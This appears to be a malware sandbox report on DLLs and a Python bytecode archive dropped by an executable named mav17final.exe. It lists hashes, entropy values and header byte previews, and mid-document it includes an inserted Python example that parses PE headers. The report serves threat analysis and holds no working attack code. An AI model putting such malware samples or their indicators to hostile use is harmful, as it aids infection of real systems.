                                                • Filename: W1dMSoIHTz.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ...".....^......L........................................P.......`....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):123664
                                                Entropy (8bit):6.058417150946148
                                                Encrypted:false
                                                SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                MD5:BD36F7D64660D120C6FB98C8F536D369
                                                SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ..."............p\..............................................|o....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):253200
                                                Entropy (8bit):6.559097478184273
                                                Encrypted:false
                                                SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".v...<......L...............................................Rn....`..........................................T..P...`T...................&......./......P.......T...........................P...@............................................text....u.......v.................. ..`.rdata..<............z..............@..@.data....*...p...$...R..............@....pdata...&.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):128272
                                                Entropy (8bit):6.398685534751033
                                                Encrypted:false
                                                SSDEEP:3072:uhGlNy/CPxvpewUjYk2f2/4YkWQNokUVrm/54h7ZIP6fxpxZ:P4/CPxvpTFk2fNKQqYx4h7r
                                                MD5:53BA094149F6FC5F4F7349D4E0019857
                                                SHA1:17F8FB2487D2DEDB2BC1595CC8DEDE2C9BCAD4F9
                                                SHA-256:EDB86A361198E68DFEEC10B8BEF6937540F43A4578356FD2F13546DE03471026
                                                SHA-512:10D1714E1CF41981EF7DA99713AD5B7C8647A13813A9012A69C4B5BB1542C4F5C170175A2CD49D94D79B5D10F71BBBA5732245C1D6DF1F35AB6ADB79F9A1D6F5
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I..I..I.4I..I...H..I...H..I...H..I...H..I...H..I...H..I..Id.I...H..I...H..I..XI..I...H..IRich..I........................PE..d......d.........." ...".(..........Px..............................................h.....`......................................... ...X...x...x......................../......X....K..T............................I..@............@...............................text....'.......(.................. ..`.rdata...g...@...h...,..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):65304
                                                Entropy (8bit):6.222786912280051
                                                Encrypted:false
                                                SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".T...~......`?...............................................%....`.............................................P.......................,......../......\...0}..T............................{..@............p..(............................text...uR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):158992
                                                Entropy (8bit):6.8491146526380025
                                                Encrypted:false
                                                SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...".b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):79640
                                                Entropy (8bit):6.290841920161528
                                                Encrypted:false
                                                SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                MD5:1EEA9568D6FDEF29B9963783827F5867
                                                SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".l...........%.......................................P......V.....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...:k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):161040
                                                Entropy (8bit):6.029728458381984
                                                Encrypted:false
                                                SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                MD5:208B0108172E59542260934A2E7CFA85
                                                SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."............l+..............................................NS....`.............................................d...t........`.......P.......F.../...p..8...0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..8....p.......8..............@..B................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                Category:dropped
                                                Size (bytes):1438373
                                                Entropy (8bit):5.59108786847922
                                                Encrypted:false
                                                SSDEEP:24576:mQR5pATu7xm4lUKdcubgAnyfbcZ0iwhBdYf9P3sRHHL:mQR5plxmQJy
                                                MD5:2F6D57BCCF7F7735ACB884A980410F6A
                                                SHA1:93A6926887A08DC09CD92864CD82B2BEC7B24EC5
                                                SHA-256:1B7D326BAD406E96A4C83B5A49714819467E3174ED0A74F81C9EBD96D1DD40B3
                                                SHA-512:95BCFC66DBE7B6AD324BD2DC2258A3366A3594BFC50118AB37A2A204906109E42192FB10A91172B340CC28C12640513DB268C854947FB9ED8426F214FF8889B4
                                                Malicious:false
                                                Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):3445016
                                                Entropy (8bit):6.099467326309974
                                                Encrypted:false
                                                SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                MD5:E94733523BCD9A1FB6AC47E10A267287
                                                SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ..."..$...................................................5......o5...`..........................................y/..h...J4.@.....4.|....p2......b4../....4..O..P.,.8.............................,.@............@4..............................text...$.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..h....p2.......1.............@..@.idata..^#...@4..$....3.............@..@.00cfg..u....p4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):39696
                                                Entropy (8bit):6.641880464695502
                                                Encrypted:false
                                                SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):704792
                                                Entropy (8bit):5.55753143710539
                                                Encrypted:false
                                                SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".D...T......<.....................................................`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):68608
                                                Entropy (8bit):5.960057524881486
                                                Encrypted:false
                                                SSDEEP:1536:Owy3DdmqfowPqaeMIBKwYx4CaeEQQoPT:cLeMIBKwYx4CaeEQQo
                                                MD5:5F3B6D0A76CC2F72539CAB35221DDCC6
                                                SHA1:14FE99DB2C22E10C467244B146FAD20DD158585B
                                                SHA-256:73295D501366010C478070ABB2ECB6455CB8BBF2D162731428ECC33CECDECC67
                                                SHA-512:6BCEAB82530B688AE78D9A68E24105574046925901E0A4456F155DB6B18BBB36507363538BB07278D8D2769673F746932E0A468C7D3ADE1EE4D2502C088AFCEB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:M..~,..~,..~,..wTU.t,..,Y..|,..,Y..r,..,Y..v,..,Y..z,..P..|,..jG..o,..~,...,..Y..r,..Y...,..Y9..,..Y...,..Rich~,..........PE..d...s.ye.........." .........p...............................................P............`.............................................p...@...@....0....... ...............@..........................................8............................................text............................... ..`.rdata..0P.......R..................@..@.data...8...........................@....pdata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):199448
                                                Entropy (8bit):6.377510350928234
                                                Encrypted:false
                                                SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                MD5:9C21A5540FC572F75901820CF97245EC
                                                SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5..I.5..M.5.5..5..I.5..I.5..I...5..I.5.Rich.5.................PE..d......d.........." ..."............0........................................ .......=....`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5762840
                                                Entropy (8bit):6.089392282930885
                                                Encrypted:false
                                                SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ...".X%..47.....\H........................................\.......X...`...........................................@......WA......p[.......V.d0....W../....[..C....).T.............................).@............p%..............................text...rV%......X%................. ..`.rdata.......p%......\%.............@..@.data.........A..L...hA.............@....pdata..d0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......rV.............@..@.reloc...C....[..D...|V.............@..B........................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):30480
                                                Entropy (8bit):6.578957517354568
                                                Encrypted:false
                                                SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                MD5:C97A587E19227D03A85E90A04D7937F6
                                                SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):1141016
                                                Entropy (8bit):5.435086202175289
                                                Encrypted:false
                                                SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".@..........P*...............................................!....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................
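The dropped-file entries above describe each file by a File Type string (PE32+ executable (DLL) ... x86-64), four digests, and a byte preview in which every unprintable byte is shown as a dot. The following Python is an added example, not code from the Joe Sandbox report, showing where those fields come from: it follows the DOS header's e_lfanew to the PE signature, reads the COFF machine word and the IMAGE_FILE_DLL characteristic, reads the optional-header magic (0x20B is PE32+, 0x10B is PE32), computes the same MD5/SHA1/SHA-256/SHA-512 digests, and renders a preview the same way. The build_sample helper constructs a minimal header (not a loadable image, and not one of the files listed above) so the script runs offline. The bytes directly after the signature are the little-endian machine word, so an x86-64 image previews as `PE..d.` (0x64 0x86), which is exactly what every PE preview in this section shows.

```python
import hashlib
import struct

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def classify_pe(data: bytes) -> dict:
    """Return the fields a sandbox 'File Type' line is built from, or pe=False."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"pe": False, "reason": "no MZ header"}
    # e_lfanew at DOS header offset 0x3C points at the 'PE\0\0' signature.
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return {"pe": False, "reason": "no PE signature at e_lfanew"}
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, nsections, _ts, _symptr, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    # First word of the optional header is the magic that distinguishes PE32 from PE32+.
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if opt_size >= 2 else 0
    return {
        "pe": True,
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "format": OPTIONAL_MAGIC.get(magic, hex(magic)),
        "dll": bool(characteristics & IMAGE_FILE_DLL),
        "sections": nsections,
    }


def hash_all(data: bytes) -> dict:
    """The four digests the report lists, upper-case hex as in the report."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def preview(data: bytes, length: int = 64) -> str:
    """Render bytes the way the Preview field does: printable ASCII kept, the rest as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def build_sample(machine: int = 0x8664, magic: int = 0x20B, dll: bool = True) -> bytes:
    """Constructed minimal PE header for offline testing (not a loadable image)."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)          # 0x40-byte DOS header
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    dos += b"\x00" * (e_lfanew - len(dos))            # pad up to the PE signature
    chars = 0x0022 | (IMAGE_FILE_DLL if dll else 0)   # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", machine, 5, 0, 0, 0, 240, chars)
    opt = struct.pack("<H", magic) + b"\x00" * 238    # magic plus zero-filled remainder
    return bytes(dos) + b"PE\x00\x00" + coff + opt


if __name__ == "__main__":
    sample = build_sample()
    info = classify_pe(sample)
    kind = "DLL" if info["dll"] else "EXE"
    print(f"File Type: {info['format']} executable ({kind}) {info['machine']}")
    for name, digest in hash_all(sample).items():
        print(f"{name.upper()}: {digest}")
    print("Preview:", preview(sample, 0x90))
```

Run it against a real dropped file by replacing `sample` with `open(path, "rb").read()`; the File Type line and digests should then match the report entry for that file.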
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
